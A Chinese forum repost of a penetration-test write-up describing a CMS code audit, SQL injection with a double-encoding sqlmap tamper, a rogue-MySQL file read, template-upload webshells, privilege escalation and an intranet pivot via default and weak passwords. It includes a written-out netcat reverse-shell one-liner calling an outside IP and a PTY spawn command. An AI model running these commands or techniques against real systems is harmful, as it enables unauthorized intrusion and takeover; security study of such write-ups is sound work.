记一次代码审计的Linux内网渗透-天涯论坛

fny5jt9 发表于 2024-10-3 18:28:12

记一次代码审计的Linux内网渗透

记一次代码审计的Linux内网渗透<img src="https://mmbiz.qpic.cn/mmbiz_gif/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyUA9iaL2dfjic05DiaMxchvqXWtJf7ib5sro4cfXZibmVEdacS4L5sJciaUrg/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyI2TSENf74UyBB7oamtksZhaedgdV4NiaIys0EHXA7RAMsnQtdmIhFgg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">1DMZWEB SERVER
InfomationGathering
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyA3g2eU61kqMTnmuBFg0m3SticicKBaKX2y7MX4jQKwZvkMKE8OZXfqhg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
看到重点是开了888、21、80、3306端口，888好似是bt，看一下80:
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyI2TSENf74UyBB7oamtksZhaedgdV4NiaIys0EHXA7RAMsnQtdmIhFgg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
便是咱们的目的站，某cmsv1.0，下载下来审计一波瞧瞧。2PHPCMS Code Audit
分析流程发掘index.php->./loader/load.php->./loader/doc.php
先看load.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyQjniam2XrcFibrYOFGYic9EDTB2pSGLulvIIEpW8fUtvxSOSnerY8sqBA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
注释亦比较清楚，便是按照url加载功能的引导页，再看doc.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyXgWAORRRj7wc4dV9ibhnM7mwtibEuW4VXkT1B7f1jq0W1Bmzn9MXnmDQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
首要包括了比较重要的/inc/fuction.php，而后对传入的参数做了cleanArrayForMysql()处理。往下看，比较重要的路由规则:
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttykH9YMgMQibQRtr8A8DdEsHG7evbfk0icfPYAcMicSHTiawyI9Q6UzWEicYw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyxXVTIkO5ZSTeFrnKCA556VeabzOsdRtgpHfyfQzcDiaKPVb9mVXmsPQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyTTGXqCEhhwQaySBDmdb4Mn1OfeRhfw6OZkT8txZxrW7JnFM4MEIyOQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
路由大概便是这般的，比较简单，然则最后一部分调用action之前有一个HTML_LOAD()：
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyTPRzxIbexeT7ciazCKP4kWSNyMibR5f5fC9OnrTnsr6jtL34acA69KCg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
经过测试应该是进入了最后一个else而后转，应该是开启了伪静态的原由。
接下来看一下常用函数有无问题:/inc/function.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyedhmztAIN3zUZLcFuTKjghn5u28L27RbBO2VvicBuibKAZzAXTvbctuA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty53p3QFhzS365bOJ7ZYaXzXBP6VGWibLm3jRj83LMXcQrhnrtwtKXt9A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
能够看到对基本sql注入的关键字进行了检测。
后台getshell:/admini/controllers/system/changeskin.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttymVyaXZXOT4nZ4aXM1QyLZa2HG8koJ2mQB5Dogww1udDcttK2l5ibT0w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
上传模板，zip文件直接解压。
SQL注入:content\search\index.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyW8ZbN322xCss2HpBoOGibYicuNtTFVMkXvJmib2jTEtRUbVIiaFm9GibADg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
search功能，在进行urldecode()之前就进行了checkSqlStr()检测处理，因此呢达不到效果。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty1q8ib2hy1LqJfj0JWmIAicGSfbYBLz0nOo7X5rP7cZgJCg6h7wnuTDEQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
写个tamper脚本，进行两次url编码就行，用sqlmap跑:
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCBP4aVMzH1oYJ87Y9yNnFGsNBxIOm8eHxW6kEZO3rsKNsRXEBXkdGw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyBVVmjr4TMlsdfxM5HLocCsNUoyf6hPUA0t6icY0vH6CueI8feQFXHlA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
跑出来以后不晓得这什么加密，看一下:/admin/login.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttylqD4bHjwf8iabdcHqsJ76TxTvb9ekuNp95yxQiaDVohLpmg1Yvb4icYvw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
跟进docEncryption:
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyIAXc88kOZO1dcbCI1PScskTz07xCvaZ9JpUNCtYl1ibLdrY2wcvWq7Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
看了下，getjxqy3()中后面三行问题都不大，但第1部分字符串截取是不可逆的。尝试能不可用sql-shell去修改一下秘码。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyoOWLXQZjoBkS9LjSibep5NibPHXBbJ5m7HF1kpbthEG5pgzcI1n9tcXw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
后面发掘数据库能够外连，尝试能不可搞到数据库账号秘码。3MySQLArbitrarily File Read
/setup/chkdb.php
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyzuvK3UAytnhTqBXsYMBHfQK6uCnKoH7OTadBA3D21F937Aib4qAEdRg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
先让它报错获取路径。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyU3sOia2g9uR3lzcyM2vCMbiaRprEH8dskiaxYKbEh0cO6SHXDDKHBibnSA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
而后本地数据库开启外连来读文件。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty2JWsw7JIeiawkicibPI6qyza00sVzOQaIb0UET4nnh8wvJichwIgrRhUBw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
读取文件的同期发掘亦爆路径了，不晓得是不是这个伪造的mysqlserver的原由，以后没办法爆路径能够试一下(伪造mysqlserver默认账号秘码便是root123456)。http://www.xxx.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbhost=xxx.xxx.xxx.xxx&action=chkdb
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyZOkALSz9yJ0pDgFBLSsXTct6KXeiahZyMickibTbFWhRnyGcCFw7RrBrg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyXYviaGaITt1JR38yxbwncqiagv966P17zuxQRGvaR6r5e3Kiccice9np5g/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
更新一波秘码直接上后台。4Bypass disable_functions
用刚才找到的上传模板getshell，本地有环境，直接把shell放进去本来的模板打包上传。发掘上传失败。
遂修改模板加上一句话亦不行，全部模板目录拜访发掘403，不外不碍事，不需要直接拜访，由于本来用的模板便是它，能够自动加载。能够执行代码，然则AntSword连不上。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyyU2FA9gjqAII6aBlX7Nzm5Fc89y1RzZ20oeMd1zc05kFIrk6R1CuGw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
菜刀成功连接，写入shell用AntSword连接就可。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty6Kl2QfCf9DTDXwp9yklvHNr2OU32WIJuZeapwOmwaVPu0KEOicUdf5g/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
估计有disablefunctions。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty9yZGwB3QdYCxECvoSyr2lF3GzluQmaWf0XoibMtBpEYSCWwCaep0lTQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">5privilegeEscalation
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCicWMdhAt2MGHUAo6f9GVZGw4XgOYvZ8VTKMdVviamicJYAT8AKN0HCuw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
看了下sudo版本，试一下。然则针对linux提权还是创立一个交互式shell比较方便。rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc192.168.8.187 1456 >/tmp/f python3 -c import pty;pty.spawn("/bin/sh")
1、SUID提权
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyRTs2PIeFfdeic6MWAaPWdKZdhamicC9k3Ajdve2Ovl1SEkaydDq9LxtA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
好家伙，直接一波root。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyo095wFL9fl1ia3yFVISicEibwOQbiaWdt2bTNicjr5WKmTgibP5blEKErX7A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
2、bt提权
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyB2SfBN6J84rgUPNdzFuibZf4icdeS5fDM98z7D26nK5nVbJZGBpicV7jw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
用户桌面发掘的bt关联信息。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttysg9yonDZL85scTicDHc6MiaF7lgruOe6G9RwUnqhmYo5rxPn6ymibic89w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
加上计划任务。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttygLPje4VyiaBhgqRwpLdZVwDZ1zqIRzXtfdMDMbrKuhaF4EJZN80IYIA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty7Lx0QqrjHzzKsqDmRibdy9cKcV2WapQia1EqIHvEzcc9BfSlN6iabKgoA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
Intranet
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyeNj1MjNQ6nXLX9gLNomxsBaiaQwlWAhaib4WBzEroSk1buPPicy4EcwqA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
两张网卡。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyJCHTazo1MrhbtT923GYMicYzuicfP1QD3xwory5GjQmMVJxq0MqicC90w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
开个代理用nmap探测一下内网发掘144是up的，再看下端口。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyn064cYrRhNwhR6DAiaD1IePxoAicdZ1Bibg1vveMdj6QMXfBJjo1rfYrw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">6emlog getshell
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyD4dM1HTbJrJVsGL5X5cn6MTicClgDib9eY7DOqdF8WibQOwUHonpADOFQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
尝试一波弱口令，经过admin:123456进入后台
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyiaJCEBaRAGZbVzIic3owcDS6kS4p2CZcia4vhbEoNLNice0HDMqJD5nD8w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyRE3sOpoJATy25aQ7EI6xLD909UVQrIiaPsOpxH66ibSRAlL9aoZxG5tg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
下载一个正常模板放一句话进去上传运用就可。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyCwV7zaKviaUAnLsiaEvsXSCdp6jYIF6BJZa1MOyF3FvA94hZ0SSNL8Yg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">7Privilege Escalation
常规试了下sudo、suid提权，msfbind亦拿不到shell，因此瞧瞧还有什么提权办法。
发掘开了8080端口是个wdcp服务器，默认秘码登陆失败admin:wdlinux.cn，然则mysql的默认秘码没改，还是上面那个。
www.target.com:8080/phpmyadmin
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyYDoFc3u4qjXBXicsADAqPCfwqvhoesUooicoRriasUCUUPUW3Ctc9eSbA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
默认秘码登陆上去后能够看到:
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttynfO6Uibp0yx2yaUNn2bNhZ5ziaotuXeTVdTkGrGCJEibL2M3dicgqIuPbA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
找到管理员秘码，md5解开后登陆上主面板就可。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttyD4ibe8ppzDN6JyZ0P9wJD2YK58vZCM2VIRwCD8gNLUGSNcjo58mN1Kw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
功能是真的全，还能改root秘码，直接提权就可。
<img src="https://mmbiz.qpic.cn/mmbiz_png/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMttysJicTIiaYgV4f8ErJCAS4DBqZGP0dNxhfIPNLX6KQ6Q9TgaDOw7pzicXw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
亦能够加个计划任务，收工~8
关注公众号

关注本公众号不定时更新文案和视频
欢迎前来关注
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/Jvbbfg0s6ADOcaeGB4RuK9ds1AQYMtty35FYyIIC8bDxGqpl4zmKpb7Z5QB14NVjrWzhuyRYaSl4NAhmich1nibg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">

nykek5i 发表于 2024-10-17 07:23:44

可以发布外链的网站 http://www.fok120.com/

7wu1wm0 发表于 2024-11-9 00:51:50

感谢您的精彩评论，为我带来了新的思考角度。

b1gc8v 发表于昨天 18:07

你的见解真是独到，让我受益匪浅。

页: [1]

天涯论坛's Archiver

记一次代码审计的Linux内网渗透